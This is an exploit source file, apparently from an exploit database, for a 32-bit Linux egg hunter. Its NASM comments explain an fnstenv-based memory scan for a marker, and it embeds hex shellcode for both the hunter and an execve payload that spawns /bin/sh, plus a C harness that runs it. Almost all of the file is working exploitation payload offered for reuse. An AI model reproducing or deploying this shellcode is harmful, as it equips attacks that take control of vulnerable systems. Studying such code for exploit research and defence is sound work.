/* ;author: Filippo "zinzloun" Bersani ;date: 25/11/2016 ;version 1.0 ;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit global _start section .text _start: fldz ;with this 2 instructions... fnstenv [esp-0xc] ;set the entry point of my egg (_start) pop esi ;get the entry point addr... lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter mov edx, dword 0x65676760 ;a dumm value.. rol edx, 0x4 ;...to get the real egg mark: 56767606 find_egg: inc esi ;scan the next section of memory after this code cmp [esi], edx ;check if we have found the egg... jz find_egg ;loop call esi ;egg found (zero flag is set), jump to the address to exec the shell code */ #include #include unsigned char egg_hunter[] = \ "\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6"; unsigned char shell_code[] = \ "\x06\x76\x76\x56" // egg id reversed "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash main() { printf("Egg hunter length: %d\n", strlen(egg_hunter)); printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); int (*ret)() = (int(*)())egg_hunter; ret(); } # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-25]